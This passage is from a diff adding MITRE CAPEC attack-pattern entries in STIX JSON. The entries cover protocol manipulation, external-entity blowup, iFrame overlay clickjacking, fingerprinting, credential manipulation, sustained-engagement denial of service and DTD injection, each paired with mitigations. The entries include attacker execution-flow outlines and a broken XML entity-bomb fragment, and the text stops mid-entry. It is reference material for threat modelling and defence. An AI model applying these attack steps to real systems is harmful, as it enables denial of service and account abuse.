"attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not rely on client validation or encoding for security purposes.", + "id": "course-of-action--040e99bd-3494-432d-a072-6400fc8f9043", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b53a383-dcc4-4eb9-a9b9-4b7b9cfc1401", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040e99bd-3494-432d-a072-6400fc8f9043", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize digital signatures to increase authentication assurance.", + "id": "course-of-action--03a878aa-814d-4ec7-8981-4019491f098a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c8ac652e-3dc2-4676-8383-373e67124466", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03a878aa-814d-4ec7-8981-4019491f098a", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize two factor authentication to increase authentication assurance.", + "id": "course-of-action--4cfdedd8-f75c-4aa9-8e79-a60fe00a2f6b", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bef5f4f9-1fce-4a46-b4fb-7c23116a91fc", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4cfdedd8-f75c-4aa9-8e79-a60fe00a2f6b", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f8b75f6-daad-4ca8-b8eb-fba33ce31e5c", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary takes advantage of weaknesses in the protocol by which a client and server are communicating to perform unexpected actions. Communication protocols are necessary to transfer messages between client and server applications. Moreover, different protocols may be used for different types of interactions.", + "external_references": [ + { + "external_id": "CAPEC-220", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/220.html" + }, + { + "external_id": "CWE-757", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html" + } + ], + "id": "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Client-Server Protocol Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n For example, an authentication protocol might be used to establish the identities of the server and client while a separate messaging protocol might be used to exchange data. If there is a weakness in a protocol used by the client and server, an attacker might take advantage of this to perform various types of attacks. For example, if the attacker is able to manipulate an authentication protocol, the attacker may be able spoof other clients or servers. If the attacker is able to manipulate a messaging protocol, the may be able to read sensitive information or modify message contents. This attack is often made easier by the fact that many clients and servers support multiple protocols to perform similar roles. For example, a server might support several different authentication protocols in order to support a wide range of clients, including legacy clients. Some of the older protocols may have vulnerabilities that allow an attacker to manipulate client-server interactions.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--13d1d169-0023-41e2-952f-7d794844733b", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda" + ], + "x_capec_prerequisites": [ + "The client and/or server must utilize a protocol that has a weakness allowing manipulation of the interaction." + ], + "x_capec_resources_required": [ + "The adversary must be able to identify the weakness in the utilized protocol and exploit it. This may require a sniffing tool as well as packet creation abilities. The adversary will be aided if they can force the client and/or server to utilize a specific protocol known to contain exploitable weaknesses." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.", + "external_references": [ + { + "external_id": "CAPEC-221", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/221.html" + }, + { + "external_id": "CWE-611", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/611.html" + }, + { + "description": "XML External Entities", + "external_id": "43", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-External-Entities" + } + ], + "id": "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Data Serialization External Entities Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "attack-pattern--b6f5248a-346f-484f-8091-8ab84288aa81" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, the XML parser parses the attacker's XML and opens the malicious URI where the attacker controls the server and writes a massive amount of data to the response stream. In this example the malicious URI is a large file transfer.\n < !DOCTYPE bomb []>&detonate;\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target web service: The adversary must first find a web service that takes input data in the form of a serialized language such as XML or YAML.

Experiment

  1. Host malicious file on a server: The adversary will create a web server that contains a malicious file. This file will be extremely large, so that if a web service were to try to load it, the service would most likely hang.

  2. Craft malicious data: Using the serialization language that the web service takes as input, the adversary will craft data that links to the malicious file using an external entity reference to the URL of the file.

Exploit

  1. Send serialized data containing URI: The adversary will send specially crafted serialized data to the web service. When the web service loads the input, it will attempt to download the malicious file. Depending on the amount of memory the web service has, this could either crash the service or cause it to hang, resulting in a Denial of Service attack.

", + "x_capec_prerequisites": [ + "A server that has an implementation that accepts entities containing URI values." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by tweaking the XML parser to not resolve external entities. If external entities are needed, then implement a custom XmlResolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.", + "id": "course-of-action--f88600ce-ddcc-4bc8-a94c-55d673aaa78d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-221-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56e07d24-a92d-4fa8-813a-42ce29f65724", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f88600ce-ddcc-4bc8-a94c-55d673aaa78d", + "target_ref": "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by tweaking the serialized data parser to not resolve external entities. If external entities are needed, then implement a custom resolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.", + "id": "course-of-action--1d15fec6-8b70-44d9-b58a-5c9aebb8153b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-221-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d30d657-82b7-41fb-8963-2316f86a288e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1d15fec6-8b70-44d9-b58a-5c9aebb8153b", + "target_ref": "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In an iFrame overlay attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system.", + "external_references": [ + { + "external_id": "CAPEC-222", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/222.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Michal Zalewski, Browser Security Handbook, 2008, Google Inc.", + "external_id": "REF-84", + "source_name": "reference_from_CAPEC", + "url": "https://code.google.com/archive/p/browsersec/wikis/Main.wiki" + }, + { + "description": "M. Mahemoff, Explaining the \"Don't Click\" Clickjacking Tweetbomb, 2009--02---12, Software As She's Developed", + "external_id": "REF-85", + "source_name": "reference_from_CAPEC", + "url": "http://softwareas.com/explaining-the-dont-click-clickjacking-tweetbomb" + } + ], + "id": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "iFrame Overlay", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The following example is a real-world iFrame overlay attack [2]. In this attack, the malicious page embeds Twitter.com on a transparent IFRAME. The status-message field is initialized with the URL of the malicious page itself. To provoke the click, which is necessary to publish the entry, the malicious page displays a button labeled \"Don't Click.\" This button is aligned with the invisible \"Update\" button of Twitter. Once the user performs the click, the status message (i.e., a link to the malicious page itself) is posted to their Twitter profile." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Craft an iFrame Overlay page: The adversary crafts a malicious iFrame overlay page.

    2. Techniques
    The adversary leverages iFrame overlay capabilities to craft a malicious iFrame overlay page.

Exploit

  1. adversary tricks victim to load the iFrame overlay page: adversary utilizes some form of temptation, misdirection or coercion to trick the victim to loading and interacting with the iFrame overlay page in a way that increases the chances that the victim will visit the malicious page.

    2. Techniques
    Trick the victim to the malicious site by sending the victim an e-mail with a URL to the site.
    Trick the victim to the malicious site by manipulating URLs on a site trusted by the victim.
    Trick the victim to the malicious site through a cross-site scripting attack.

  2. Trick victim into interacting with the iFrame overlay page in the desired manner: The adversary tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege.

    3. Techniques
    Hide action controls over very commonly used functionality.
    Hide action controls over very psychologically tempting content.
", + "x_capec_extended_description": "\n While being logged in to some target system, the victim visits the adversarys' malicious site which displays a UI that the victim wishes to interact with. In reality, the iFrame overlay page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The victim is communicating with the target application via a web based UI and not a thick client. The victim's browser security policies allow iFrames. The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser). The victim has an active session with the target system. The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "Crafting the proper malicious site and luring the victim to this site is not a trivial task." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable iFrames in the Web browser.", + "id": "course-of-action--da7d677a-ae6f-4b92-b6a4-578b18ac2096", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f004d2c5-c636-4b39-9be8-fbf612902dbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da7d677a-ae6f-4b92-b6a4-578b18ac2096", + "target_ref": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", + "id": "course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8ceb66f2-318c-41f7-9c7f-8411d9e9db00", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353", + "target_ref": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.", + "id": "course-of-action--37728b90-749a-4550-90b1-0befc14f3052", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--653bb15f-3973-4933-b573-881524838af8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--37728b90-749a-4550-90b1-0befc14f3052", + "target_ref": "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary compares output from a target system to known indicators that uniquely identify specific details about the target. Most commonly, fingerprinting is done to determine operating system and application versions. Fingerprinting can be done passively as well as actively. Fingerprinting by itself is not usually detrimental to the target. However, the information gathered through fingerprinting often enables an adversary to discover existing weaknesses in the target.", + "external_references": [ + { + "external_id": "CAPEC-224", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/224.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Fingerprinting", + "external_id": "45", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Fingerprinting" + } + ], + "id": "attack-pattern--76e6fe1e-34f2-40cd-8f12-f4d4f9c41808", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617", + "attack-pattern--f40c59ce-f023-4e3e-937e-07fa2b7bc3ec", + "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290" + ], + "x_capec_prerequisites": [ + "A means by which to interact with the target system directly." + ], + "x_capec_resources_required": [ + "If on a network, the adversary needs a tool capable of viewing network communications at the packet level and with header information, like Mitmproxy, Wireshark, or Fiddler." + ], + "x_capec_skills_required": { + "Medium": "Some fingerprinting activity requires very specific knowledge of how different operating systems respond to various TCP/IP requests. Application fingerprinting can be as easy as envoking the application with the correct command line argument, or mouse clicking in the appropriate place on the screen." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "While some information is shared by systems automatically based on standards and protocols, remove potentially sensitive information that is not necessary for the application's functionality as much as possible.", + "id": "course-of-action--e117150b-4841-447b-aef4-8a9aa1d5ad94", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-224-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1eb63bf7-b7b2-4e41-9dfa-0544c490911b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e117150b-4841-447b-aef4-8a9aa1d5ad94", + "target_ref": "attack-pattern--76e6fe1e-34f2-40cd-8f12-f4d4f9c41808", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server.", + "external_references": [ + { + "external_id": "CAPEC-226", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/226.html" + }, + { + "external_id": "CWE-565", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + } + ], + "id": "attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Session Credential Falsification through Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.\n ", + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users." + ], + "x_capec_resources_required": [ + "An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.", + "external_references": [ + { + "external_id": "CAPEC-227", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/227.html" + }, + { + "external_id": "CWE-400", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "description": "Endpoint Denial of Service", + "external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--6e3dda09-c1da-4f44-a0b3-e0e3b6fe0601", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Sustained Client Engagement", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The degree to which the attack is successful depends upon the adversary's ability to sustain resource requests over time with a volume that exceeds the normal usage by legitimate users, as well as other mitigating circumstances such as the target's ability to shift load or acquire additional resources to deal with the depletion. This attack differs from a flooding attack as it is not entirely dependent upon large volumes of requests, and it differs from resource leak exposures which tend to exploit the surrounding environment needed for the resource to function. The key factor in a sustainment attack are the repeated requests that take longer to process than usual.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934" + ], + "x_capec_prerequisites": [ + "This pattern of attack requires a temporal aspect to the servicing of a given request. Success can be achieved if the adversary can make requests that collectively take more time to complete than legitimate user requests within the same time frame." + ], + "x_capec_resources_required": [ + "To successfully execute this pattern of attack, a script or program is often required that is capable of continually engaging the target and maintaining sustained usage of a specific resource. Depending on the configuration of the target, it may or may not be necessary to involve a network or cluster of objects all capable of making parallel requests." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Potential mitigations include requiring a unique login for each resource request, constraining local unprivileged access by disallowing simultaneous engagements of the resource, or limiting access to the resource to one access per IP address. In such scenarios, the adversary would have to increase engagements either by launching multiple sessions manually or programmatically to counter such defenses.", + "id": "course-of-action--ba77ea83-e6e2-4046-9e24-9a6bd2a3a947", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-227-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f425c6e4-a641-4d70-890a-e1583d4defe9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba77ea83-e6e2-4046-9e24-9a6bd2a3a947", + "target_ref": "attack-pattern--6e3dda09-c1da-4f44-a0b3-e0e3b6fe0601", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker injects malicious content into an application's DTD in an attempt to produce a negative technical impact. DTDs are used to describe how XML documents are processed. Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion.", + "external_references": [ + { + "external_id": "CAPEC-228", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/228.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Ryan Naraine, DoS Flaw in SOAP DTD Parameter, InternetNews.com, 2003--12---15, ITBusiness Edge, Quinstreet Inc.", + "external_id": "REF-86", + "source_name": "reference_from_CAPEC", + "url": "http://www.internetnews.com/dev-news/article.php/3289191" + } + ], + "id": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "DTD Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--8e3a14fd-870a-4286-866d-805107c7d922" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975" + ], + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instances of web services to process XML requests.

